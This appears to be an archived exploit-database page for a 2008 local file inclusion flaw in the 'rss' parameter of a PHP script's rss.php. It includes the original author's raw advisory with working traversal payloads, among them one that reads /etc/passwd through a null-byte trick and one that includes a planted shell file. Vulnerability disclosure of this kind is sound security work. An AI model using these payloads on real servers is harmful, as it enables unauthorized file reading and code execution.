header-logo
Suggest Exploit
vendor:
N/A
by:
JIKO
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Local File Inclusion Vulnerabilities

The vulnerability is caused due to the improper validation of user-supplied input in the 'rss' parameter of the 'rss.php' script. This can be exploited to include arbitrary files from local resources via directory traversal attacks.

Mitigation:

Input validation should be used to prevent directory traversal attacks.
Source

Exploit-DB raw data:

####################################################################################
######              Local File Inclusion Vulnerabilities                       #####
###### http://www.the-ghost.com/extras/am2/am%202.0%20beta%201.zip             #####
###### author : JIKO                                                           #####
###### foor read a php file >     ?rss=[name of file iwthout php]              #####
###### for execute exploit does not write extention of file                    #####
######                                                                         #####
######                                                                         #####
###### exploit : /Script/rss.php?rss=../[name of file wthout php]              #####
######                                                                         #####
###### example : /Script/rss.php?rss==/home/user/shell                         #####
######                                                                         #####
###### other files:        rss=../../../../etc/passwd%00                       #####
######           WwW.No-exploit.Com  cha7ta.eu                                 #####
######  H-T Team , v4 Team  , Tryag , no-Back all my friend                    #####
####################################################################################
------==        troops of Mohamed comming inchalah     =-----------------
Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc

# milw0rm.com [2008-09-29]

Navigation

Suggest Exploit

Services By CQR